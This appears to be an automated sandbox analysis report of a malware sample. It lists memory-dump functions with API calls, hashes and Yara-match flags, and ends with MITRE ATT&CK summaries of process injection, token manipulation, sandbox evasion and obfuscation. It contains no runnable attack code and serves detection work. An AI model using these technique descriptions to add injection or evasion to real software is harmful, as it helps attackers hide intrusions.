Uniqueness Score: -1.00%

Function 03A696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A696DA

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
Instruction ID: 6ff9a4705a91f3839911f737f38d9dd811fbaf85ed41eb05eb16ec106d33f042
Opcode Fuzzy Hash: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
Instruction Fuzzy Hash: 5E90027120104C42E100A1694848B4610059BE0341F51C017A0115654D8755C8517571

Uniqueness

Uniqueness Score: -1.00%

Function 03A69660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6966A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 704ae5591a5937ba29dcb2a3caaeb3d5effd30f2ac25d3c5af8e68ec575a105b
Instruction ID: 625084e0ae489f028e239da245256bd2972142c7e5dd55cda0d16637b609f40a
Opcode Fuzzy Hash: 704ae5591a5937ba29dcb2a3caaeb3d5effd30f2ac25d3c5af8e68ec575a105b
Instruction Fuzzy Hash: 5190027120104C02E180B169484864A10059BD1341F91C016A0016654DCB558A5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 03A69650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6965A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
Instruction ID: 48497deafb2b1905aadacf880c48d9ddb83953f91b294848b700f0a41c9db37b
Opcode Fuzzy Hash: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
Instruction Fuzzy Hash: E290027120508C42E140B1694848A4610159BD0345F51C012A0055694D97658D55B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 03A69A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A69A5A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db6a661cbdf481216786036bd471a5cbeb01e0e7215ed7c779a06f0a21856197
Instruction ID: 729207362e6a40be38404bd712be6d800f691d9ebda7c42a07a2380d7b69f2d6
Opcode Fuzzy Hash: db6a661cbdf481216786036bd471a5cbeb01e0e7215ed7c779a06f0a21856197
Instruction Fuzzy Hash: 7D90026121184442E200A5794C58B0710059BD0343F51C116A0145554CCA5588616571

Uniqueness

Uniqueness Score: -1.00%

Function 03A699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A699AA

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfac68804d052c4868f6bcd543b36ef3d8700e0c360db00b38dcd59e26d2a4e6
Instruction ID: 44262468ee87993cd8c67480df7a7b1f5ac87f0bba6650e7990ea0231f9e36bf
Opcode Fuzzy Hash: dfac68804d052c4868f6bcd543b36ef3d8700e0c360db00b38dcd59e26d2a4e6
Instruction Fuzzy Hash: 3D9002A134104842E100A1694858B061005DBE1341F51C016E1055554D8759CC527176

Uniqueness

Uniqueness Score: -1.00%

Function 03A695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A695DA

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce702b2a2fab6dbd77eb79762bf50ce841c2ae36a6b66396845fda1cfa4ede7e
Instruction ID: a21c7100f66e6dbc31690d306647cedb605f27b7f832af482bbd0149157da482
Opcode Fuzzy Hash: ce702b2a2fab6dbd77eb79762bf50ce841c2ae36a6b66396845fda1cfa4ede7e
Instruction Fuzzy Hash: 809002A1202044035105B1694858616500A9BE0241B51C022E1005590DC66588917175

Uniqueness

Uniqueness Score: -1.00%

Function 03A69910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6991A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d08c902363993be44f92dbb0b499f9c727cb91616ce5d11dcbebd00d96b5cb68
Instruction ID: 6d2177fbd1f68e94df6f0e0051f03f026adf72764409d6d14fd27e56a110e2ba
Opcode Fuzzy Hash: d08c902363993be44f92dbb0b499f9c727cb91616ce5d11dcbebd00d96b5cb68
Instruction Fuzzy Hash: A69002B120104802E140B169484874610059BD0341F51C012A5055554E87998DD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 03A69540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6954A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d040720c37b6ba41e69ce8245c94e90683b809bab259f7d45b7634a5f0e08d39
Instruction ID: f1908b52dd07e4782c4bc79afb7e865991fcc99e18ea6179c72111d84ded709f
Opcode Fuzzy Hash: d040720c37b6ba41e69ce8245c94e90683b809bab259f7d45b7634a5f0e08d39
Instruction Fuzzy Hash: B6900265211044031105E5690B4850710469BD5391351C022F1006550CD76188616171

Uniqueness

Uniqueness Score: -1.00%

Function 03A69860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6986A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cfd6b6008e4832260095f2e42809ed2a52ea8fade8a94a4267f5c51ec3b1e797
Instruction ID: 27d58bb3dd5f8236bb02428bbdeea816966bdb51fda715268dede09c90fa8bea
Opcode Fuzzy Hash: cfd6b6008e4832260095f2e42809ed2a52ea8fade8a94a4267f5c51ec3b1e797
Instruction Fuzzy Hash: 7690027120104813E111A169494870710099BD0281F91C413A0415558D97968952B171

Uniqueness

Uniqueness Score: -1.00%

Function 03A69840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6984A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 781af753466bc27671bd5e303761baacbb48e30defd01042b72516ebc874056d
Instruction ID: a5a557d8d0071509ae8945f0d43b9831a1bcb82960969143d2e686814248ae98
Opcode Fuzzy Hash: 781af753466bc27671bd5e303761baacbb48e30defd01042b72516ebc874056d
Instruction Fuzzy Hash: 85900261242085526545F16948485075006ABE0281791C013A1405950C86669856E671

Uniqueness

Uniqueness Score: -1.00%

Function 02D372F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02D37398

Strings

wininet.dll, xrefs: 02D3734E, 02D37357
net.dll, xrefs: 02D37361, 02D373E7, 02D373BF, 02D373CB, 02D373F3

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 160024aed0479bc2c1a33c7cb7aa186926e21164ea43bac4dc63450672c7ad42
Instruction ID: 1183f18d78030750c2bea1b9581e6058e7a561358ae41c6e6cc614c8c10ba0f2
Opcode Fuzzy Hash: 160024aed0479bc2c1a33c7cb7aa186926e21164ea43bac4dc63450672c7ad42
Instruction Fuzzy Hash: 56318EB6641604ABD712DF64C8A0FABF7B9EF48700F00811DFA5A9B240D770A845CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D372E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02D37398

Strings

wininet.dll, xrefs: 02D3734E, 02D37357
net.dll, xrefs: 02D37361, 02D373BF, 02D373CB

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 2c5597f45a96c0c43c6463b97e1a6d216cdab732c427244a00f7e0e18c2b9122
Instruction ID: 3b57e9237dade40a67146ed711cb315d9c506b8f514c087c06642367687df375
Opcode Fuzzy Hash: 2c5597f45a96c0c43c6463b97e1a6d216cdab732c427244a00f7e0e18c2b9122
Instruction Fuzzy Hash: CF218CB6A41605ABD712DF64C8A1FABB7B8FB48704F008129FA599B240D374A845CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02D388E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D23B93), ref: 02D3890D

Strings

.z`, xrefs: 02D388FC, 02D38908

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 864a59f2fcdf4244934f6e279394e509dd6682ae3966c70c6a0153b2ccba5f27
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F5E012B1200208ABDB18EF99CC48EA777ADEF88750F018558BE086B241C670E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D29B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D29BA2

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: e6936120256b70f9537ad9af1cbef49763e21c2ddceb446daff8c98afd49c2e6
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 72011EB6E0020DABDB10DBE4DC91FDDB3799B54308F1041A5E90897281F671EB18CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D38950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389A4

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 860eac20afb7102b5fb341db2e7ffc55df3f4ec77e10c856b28867e716a99050
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 3101AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D3894D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389A4

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: b52bf700e7190265ee77e9c483130527f38775d5d1a90b7cda7f6c976cdc95a1
Instruction ID: 360d8beef196d5e376cff28f505e4a43ce44f698945db625c059960f66123df5
Opcode Fuzzy Hash: b52bf700e7190265ee77e9c483130527f38775d5d1a90b7cda7f6c976cdc95a1
Instruction Fuzzy Hash: D501A4B2215108AFCB58CF89DC80EEB37AAAF8C354F158258BA0DD7240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D388D2, Relevance: 1.5, APIs: 1, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D33526,?,02D33C9F,02D33C9F,?,02D33526,?,?,?,?,?,00000000,00000000,?), ref: 02D388CD

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9c09b41f37006e4609163ae0fe8f87cac94a10c858b150f86bb80a1d86ca6338
Instruction ID: 42687522982e4dcc3840f06f86f056b3c042798306388b3edb5e4ea627fea4fe
Opcode Fuzzy Hash: 9c09b41f37006e4609163ae0fe8f87cac94a10c858b150f86bb80a1d86ca6338
Instruction Fuzzy Hash: 43F027B64082446FEB05EA78EC828E77758DE802147114A5DF88893302D175D818D6F1

Uniqueness

Uniqueness Score: -1.00%

Function 02D37413, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D2CCE0,?,?), ref: 02D3745C

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d3980d446a3f9ea057f39f1eeb118e6f4bd7b66fb5ef81d139f3b23075802f48
Instruction ID: d3232564c4f8c9c2171cafcffda272633b75ebfb01a4d1dcad54e8cbe47022f5
Opcode Fuzzy Hash: d3980d446a3f9ea057f39f1eeb118e6f4bd7b66fb5ef81d139f3b23075802f48
Instruction Fuzzy Hash: B6F0227378030036E2322598CC03FD7728ECB95B20F210029FB49BB3C0E5A5B9024AE4

Uniqueness

Uniqueness Score: -1.00%

Function 02D37420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D2CCE0,?,?), ref: 02D3745C

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
Instruction ID: b5cd16ca53000e7e86db9ef483b651a0f0d5644cd05b358f4fbf5aa1c13e9e9a
Opcode Fuzzy Hash: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
Instruction Fuzzy Hash: FEE06D733802143AE2216599EC02FA7B29DDB85B35F14002AFA0DEA2C0D595F80146A4

Uniqueness

Uniqueness Score: -1.00%

Function 02D38912, Relevance: 1.5, APIs: 1, Instructions: 33processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389A4

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: c03450fe15e591a132752a2007fe1fd35fd6b31d431ff0d5059bcf4eb05397d1
Instruction ID: eda9dcebd071522ab55d877f31c1ce23473b93be0f2cb5903e0ffbcea3fbf78a
Opcode Fuzzy Hash: c03450fe15e591a132752a2007fe1fd35fd6b31d431ff0d5059bcf4eb05397d1
Instruction Fuzzy Hash: EDF0D4B2214549AB8B08CF99EC80CAB73AAEB9C200B108209F908C7245C630E812DB70

Uniqueness

Uniqueness Score: -1.00%

Function 02D38A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D2CFB2,02D2CFB2,?,00000000,?,?), ref: 02D38A70

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 43b765ae665bb96cc2efd2aeadf232730df1c724f81eb1f27addf6b0505a79ef
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 12E01AB16002086BDB14DF49CC84EE737ADEF88650F018154BE0867241C970E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D388A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D33526,?,02D33C9F,02D33C9F,?,02D33526,?,?,?,?,?,00000000,00000000,?), ref: 02D388CD

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 684ec36d07f1474de6c0501236884be659fe0839006ffd813c254ce58a657fc9
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 10E012B1200208ABDB18EF99CC44EA777ADEF88650F118558BE086B241C670F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D2D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02D27C83,?), ref: 02D2D44B

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 713c6649328f188d4dbd1870e0948d0cda075691e7e73045f748783cc0929f05
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 6CD0A7717503043BE610FAA4DC03F2672CD9B54B04F494074F948E73C3DA54F8018571

Uniqueness

Uniqueness Score: -1.00%

Function 03A6967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A69694

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
Instruction ID: d73c0bc47b361db7377fbea3dba4d41e0c23f8612a4cf06d937b75982474fef6
Opcode Fuzzy Hash: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
Instruction Fuzzy Hash: 3BB09B719015C5C5E611D7704B0C71779047BD0741F16C057D1020641A477CC091F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02D35825, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1808744c07c487f415e46b334bbabf6672027bedf2b96f50157d8773df3ec71e
Instruction ID: 2403f26e19db3add2c3932942f3c7878b83891ff63b45b584f85abd566efa169
Opcode Fuzzy Hash: 1808744c07c487f415e46b334bbabf6672027bedf2b96f50157d8773df3ec71e
Instruction Fuzzy Hash: BFC08C73B480300AC3215CC93C410F8EB21C0EB232B283632E1C8E7043C202C4034288

Uniqueness

Uniqueness Score: -1.00%

Function 03ABFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E03ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E03A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x03abfdda
0x03abfde2
0x03abfde5
0x03abfdec
0x03abfdfa
0x03abfdff
0x03abfe0a
0x03abfe0f
0x03abfe17
0x03abfe1e
0x03abfe19
0x03abfe19
0x03abfe19
0x03abfe20
0x03abfe21
0x03abfe22
0x03abfe25
0x03abfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03ABFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03ABFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03ABFE01

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
Instruction ID: a4843125a9ce4946c374dc1e76af55a1342276d23a806ab14c9c45447ecf41d8
Opcode Fuzzy Hash: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
Instruction Fuzzy Hash: 03F028366002007FD6205A45CC01F63BB6EEB41730F140216F624495D2D962F87082A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

